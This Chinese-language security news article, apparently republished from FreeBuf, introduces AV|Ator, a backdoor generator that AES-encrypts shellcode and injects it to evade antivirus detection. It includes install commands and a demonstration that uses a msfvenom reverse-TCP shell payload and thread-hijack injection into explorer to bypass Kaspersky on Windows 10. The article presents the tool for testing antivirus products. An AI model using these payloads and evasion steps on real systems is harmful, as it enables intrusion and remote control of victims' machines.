AV|Ator:一款功能强大的AV检测绕过工具
2023-5-9 19:3:4 Author: FreeBuf(查看原文) 阅读量:15 收藏

 关于AV | Ator 

AV|Ator是一款功能强大的AV检测绕过工具,从本质上来说,该工具是一个后门生成实用工具,该工具使用了加密技术和注入技术来尝试绕过反病毒产品的检测。因此,广大研究人员可以使用该工具来测试目标反病毒产品的安全检测能力。

 技术实现 

1、该工具使用了AES加密算法来对给定的Shellcode进行加密处理;

2、该工具可以生成一个包含了加密Payload的可执行文件;

3、最终的Shellcode可以使用各种不同的注入技术在目标操作系统中执行注入和解密;

 工具安装 

Windows安装

广大研究人员可以直接点击此链接下载预编译的项目可执行文件https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

除此之外,我们也可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/Ch0pin/AVIator.git

并使用C#开发环境来对项目代码进行本地编译。

Linux安装

首先,我们需要根据Linux操作系统发行版版本来安装Mono,然后下载并运行项目代码即可。

下面以Kali为例:

git clone https://github.com/Ch0pin/AVIator.gitcd AVIatorroot@kali# apt install mono-develroot@kali# mono aviator.exe

 工具使用 

该工具提供了一个表单,其中包含三个主要的输入参数:

1、加密密钥,用于对Shellcode进行加密;

2、IV向量,用于AES加密;

3、Shellcode;

 工具使用演示 

在下面的工具使用演示样例中,我们将尝试在一台Windows 10 x64主机上绕过最新版本的卡巴斯基反病毒产品。

首先,我们使用msfvenom来创建Payload:

msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

(向右滑动,查看更多)

接下来,对AV|Ator执行下列操作:

目标操作系统架构:x64;

注入技术:线程劫持(Shellcode Arch:x64,OS Arch:x64);;

目标程序:explorer(默认);

然后在我们的设备上设置好监听器,然后在目标设备上运行生成的可执行文件即可。

 工具运行截图 

 许可证协议 

本项目的开发与发布遵循GPL-3.0开源许可证协议。

 项目地址 

AV|Ator

https://github.com/Ch0pin/AVIator

参考资料:

https://en.wikipedia.org/wiki/Ator

https://attack.mitre.org/techniques/T1055/

精彩推荐


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651224130&idx=4&sn=934a239f99ae550b7ec138cd7d502484&chksm=bd1deac98a6a63dfe866053afbf87488a40221d4d3a67b6636fac8c6296f14a16f4b9d13516d#rd
如有侵权请联系:admin#unsafe.sh